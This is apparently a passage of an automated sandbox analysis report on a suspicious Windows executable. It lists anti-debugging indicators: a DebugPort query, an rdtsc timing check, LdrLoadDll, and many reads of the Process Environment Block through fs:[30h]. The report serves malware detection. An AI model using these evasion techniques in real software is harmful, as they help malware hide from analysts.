                Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00409AA0 rdtsc 11_2_00409AA0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0040ACE0 LdrLoadDll,11_2_0040ACE0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE10E mov eax, dword ptr fs:[00000030h]11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE10E mov ecx, dword ptr fs:[00000030h]11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE10E mov eax, dword ptr fs:[00000030h]11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE10E mov eax, dword ptr fs:[00000030h]11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE10E mov ecx, dword ptr fs:[00000030h]11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE10E mov eax, dword ptr fs:[00000030h]11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE10E mov eax, dword ptr fs:[00000030h]11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE10E mov ecx, dword ptr fs:[00000030h]11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE10E mov eax, dword ptr fs:[00000030h]11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE10E mov ecx, dword ptr fs:[00000030h]11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CA118 mov ecx, dword ptr fs:[00000030h]11_2_010CA118
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CA118 mov eax, dword ptr fs:[00000030h]11_2_010CA118
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CA118 mov eax, dword ptr fs:[00000030h]11_2_010CA118
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CA118 mov eax, dword ptr fs:[00000030h]11_2_010CA118
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E0115 mov eax, dword ptr fs:[00000030h]11_2_010E0115
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01050124 mov eax, dword ptr fs:[00000030h]11_2_01050124
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B4144 mov eax, dword ptr fs:[00000030h]11_2_010B4144
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B4144 mov eax, dword ptr fs:[00000030h]11_2_010B4144
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B4144 mov ecx, dword ptr fs:[00000030h]11_2_010B4144
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B4144 mov eax, dword ptr fs:[00000030h]11_2_010B4144
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B4144 mov eax, dword ptr fs:[00000030h]11_2_010B4144
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B8158 mov eax, dword ptr fs:[00000030h]11_2_010B8158
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01026154 mov eax, dword ptr fs:[00000030h]11_2_01026154
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01026154 mov eax, dword ptr fs:[00000030h]11_2_01026154
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101C156 mov eax, dword ptr fs:[00000030h]11_2_0101C156
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4164 mov eax, dword ptr fs:[00000030h]11_2_010F4164
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4164 mov eax, dword ptr fs:[00000030h]11_2_010F4164
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01060185 mov eax, dword ptr fs:[00000030h]11_2_01060185
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010DC188 mov eax, dword ptr fs:[00000030h]11_2_010DC188
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010DC188 mov eax, dword ptr fs:[00000030h]11_2_010DC188
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C4180 mov eax, dword ptr fs:[00000030h]11_2_010C4180
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C4180 mov eax, dword ptr fs:[00000030h]11_2_010C4180
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A019F mov eax, dword ptr fs:[00000030h]11_2_010A019F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A019F mov eax, dword ptr fs:[00000030h]11_2_010A019F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A019F mov eax, dword ptr fs:[00000030h]11_2_010A019F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A019F mov eax, dword ptr fs:[00000030h]11_2_010A019F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101A197 mov eax, dword ptr fs:[00000030h]11_2_0101A197
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101A197 mov eax, dword ptr fs:[00000030h]11_2_0101A197
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101A197 mov eax, dword ptr fs:[00000030h]11_2_0101A197
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E61C3 mov eax, dword ptr fs:[00000030h]11_2_010E61C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E61C3 mov eax, dword ptr fs:[00000030h]11_2_010E61C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E1D0 mov eax, dword ptr fs:[00000030h]11_2_0109E1D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E1D0 mov eax, dword ptr fs:[00000030h]11_2_0109E1D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E1D0 mov ecx, dword ptr fs:[00000030h]11_2_0109E1D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E1D0 mov eax, dword ptr fs:[00000030h]11_2_0109E1D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E1D0 mov eax, dword ptr fs:[00000030h]11_2_0109E1D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F61E5 mov eax, dword ptr fs:[00000030h]11_2_010F61E5
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010501F8 mov eax, dword ptr fs:[00000030h]11_2_010501F8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A4000 mov ecx, dword ptr fs:[00000030h]11_2_010A4000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h]11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h]11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h]11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h]11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h]11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h]11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h]11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h]11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103E016 mov eax, dword ptr fs:[00000030h]11_2_0103E016
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103E016 mov eax, dword ptr fs:[00000030h]11_2_0103E016
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103E016 mov eax, dword ptr fs:[00000030h]11_2_0103E016
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103E016 mov eax, dword ptr fs:[00000030h]11_2_0103E016
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101A020 mov eax, dword ptr fs:[00000030h]11_2_0101A020
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101C020 mov eax, dword ptr fs:[00000030h]11_2_0101C020
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B6030 mov eax, dword ptr fs:[00000030h]11_2_010B6030
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01022050 mov eax, dword ptr fs:[00000030h]11_2_01022050
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6050 mov eax, dword ptr fs:[00000030h]11_2_010A6050
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104C073 mov eax, dword ptr fs:[00000030h]11_2_0104C073
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102208A mov eax, dword ptr fs:[00000030h]11_2_0102208A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010180A0 mov eax, dword ptr fs:[00000030h]11_2_010180A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B80A8 mov eax, dword ptr fs:[00000030h]11_2_010B80A8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E60B8 mov eax, dword ptr fs:[00000030h]11_2_010E60B8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E60B8 mov ecx, dword ptr fs:[00000030h]11_2_010E60B8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A20DE mov eax, dword ptr fs:[00000030h]11_2_010A20DE
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101A0E3 mov ecx, dword ptr fs:[00000030h]11_2_0101A0E3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A60E0 mov eax, dword ptr fs:[00000030h]11_2_010A60E0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010280E9 mov eax, dword ptr fs:[00000030h]11_2_010280E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101C0F0 mov eax, dword ptr fs:[00000030h]11_2_0101C0F0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010620F0 mov ecx, dword ptr fs:[00000030h]11_2_010620F0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A30B mov eax, dword ptr fs:[00000030h]11_2_0105A30B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A30B mov eax, dword ptr fs:[00000030h]11_2_0105A30B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A30B mov eax, dword ptr fs:[00000030h]11_2_0105A30B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101C310 mov ecx, dword ptr fs:[00000030h]11_2_0101C310
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01040310 mov ecx, dword ptr fs:[00000030h]11_2_01040310
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F8324 mov eax, dword ptr fs:[00000030h]11_2_010F8324
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F8324 mov ecx, dword ptr fs:[00000030h]11_2_010F8324
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F8324 mov eax, dword ptr fs:[00000030h]11_2_010F8324
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F8324 mov eax, dword ptr fs:[00000030h]11_2_010F8324
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F634F mov eax, dword ptr fs:[00000030h]11_2_010F634F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h]11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A035C mov eax, dword ptr fs:[00000030h]11_2_010A035C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A035C mov eax, dword ptr fs:[00000030h]11_2_010A035C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A035C mov eax, dword ptr fs:[00000030h]11_2_010A035C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A035C mov ecx, dword ptr fs:[00000030h]11_2_010A035C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A035C mov eax, dword ptr fs:[00000030h]11_2_010A035C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A035C mov eax, dword ptr fs:[00000030h]11_2_010A035C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EA352 mov eax, dword ptr fs:[00000030h]11_2_010EA352
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C8350 mov ecx, dword ptr fs:[00000030h]11_2_010C8350
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C437C mov eax, dword ptr fs:[00000030h]11_2_010C437C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101E388 mov eax, dword ptr fs:[00000030h]11_2_0101E388
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101E388 mov eax, dword ptr fs:[00000030h]11_2_0101E388
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101E388 mov eax, dword ptr fs:[00000030h]11_2_0101E388
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104438F mov eax, dword ptr fs:[00000030h]11_2_0104438F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104438F mov eax, dword ptr fs:[00000030h]11_2_0104438F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01018397 mov eax, dword ptr fs:[00000030h]11_2_01018397
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01018397 mov eax, dword ptr fs:[00000030h]11_2_01018397
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01018397 mov eax, dword ptr fs:[00000030h]11_2_01018397
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010DC3CD mov eax, dword ptr fs:[00000030h]11_2_010DC3CD
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A3C0 mov eax, dword ptr fs:[00000030h]11_2_0102A3C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A3C0 mov eax, dword ptr fs:[00000030h]11_2_0102A3C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A3C0 mov eax, dword ptr fs:[00000030h]11_2_0102A3C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A3C0 mov eax, dword ptr fs:[00000030h]11_2_0102A3C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A3C0 mov eax, dword ptr fs:[00000030h]11_2_0102A3C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A3C0 mov eax, dword ptr fs:[00000030h]11_2_0102A3C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010283C0 mov eax, dword ptr fs:[00000030h]11_2_010283C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010283C0 mov eax, dword ptr fs:[00000030h]11_2_010283C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010283C0 mov eax, dword ptr fs:[00000030h]11_2_010283C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010283C0 mov eax, dword ptr fs:[00000030h]11_2_010283C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A63C0 mov eax, dword ptr fs:[00000030h]11_2_010A63C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE3DB mov eax, dword ptr fs:[00000030h]11_2_010CE3DB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE3DB mov eax, dword ptr fs:[00000030h]11_2_010CE3DB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE3DB mov ecx, dword ptr fs:[00000030h]11_2_010CE3DB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CE3DB mov eax, dword ptr fs:[00000030h]11_2_010CE3DB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C43D4 mov eax, dword ptr fs:[00000030h]11_2_010C43D4
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C43D4 mov eax, dword ptr fs:[00000030h]11_2_010C43D4
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h]11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h]11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h]11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h]11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h]11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h]11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h]11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h]11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103E3F0 mov eax, dword ptr fs:[00000030h]11_2_0103E3F0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103E3F0 mov eax, dword ptr fs:[00000030h]11_2_0103E3F0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103E3F0 mov eax, dword ptr fs:[00000030h]11_2_0103E3F0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010563FF mov eax, dword ptr fs:[00000030h]11_2_010563FF
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101823B mov eax, dword ptr fs:[00000030h]11_2_0101823B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A8243 mov eax, dword ptr fs:[00000030h]11_2_010A8243
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A8243 mov ecx, dword ptr fs:[00000030h]11_2_010A8243
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101A250 mov eax, dword ptr fs:[00000030h]11_2_0101A250
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F625D mov eax, dword ptr fs:[00000030h]11_2_010F625D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01026259 mov eax, dword ptr fs:[00000030h]11_2_01026259
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010DA250 mov eax, dword ptr fs:[00000030h]11_2_010DA250
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010DA250 mov eax, dword ptr fs:[00000030h]11_2_010DA250
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01024260 mov eax, dword ptr fs:[00000030h]11_2_01024260
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01024260 mov eax, dword ptr fs:[00000030h]11_2_01024260
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01024260 mov eax, dword ptr fs:[00000030h]11_2_01024260
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101826B mov eax, dword ptr fs:[00000030h]11_2_0101826B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h]11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h]11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h]11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h]11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h]11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h]11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h]11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h]11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h]11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h]11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h]11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D0274 mov eax, dword ptr fs:[00000030h]11_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E284 mov eax, dword ptr fs:[00000030h]11_2_0105E284
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E284 mov eax, dword ptr fs:[00000030h]11_2_0105E284
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A0283 mov eax, dword ptr fs:[00000030h]11_2_010A0283
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A0283 mov eax, dword ptr fs:[00000030h]11_2_010A0283
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A0283 mov eax, dword ptr fs:[00000030h]11_2_010A0283
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010302A0 mov eax, dword ptr fs:[00000030h]11_2_010302A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010302A0 mov eax, dword ptr fs:[00000030h]11_2_010302A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B62A0 mov eax, dword ptr fs:[00000030h]11_2_010B62A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B62A0 mov ecx, dword ptr fs:[00000030h]11_2_010B62A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B62A0 mov eax, dword ptr fs:[00000030h]11_2_010B62A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B62A0 mov eax, dword ptr fs:[00000030h]11_2_010B62A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B62A0 mov eax, dword ptr fs:[00000030h]11_2_010B62A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B62A0 mov eax, dword ptr fs:[00000030h]11_2_010B62A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A2C3 mov eax, dword ptr fs:[00000030h]11_2_0102A2C3
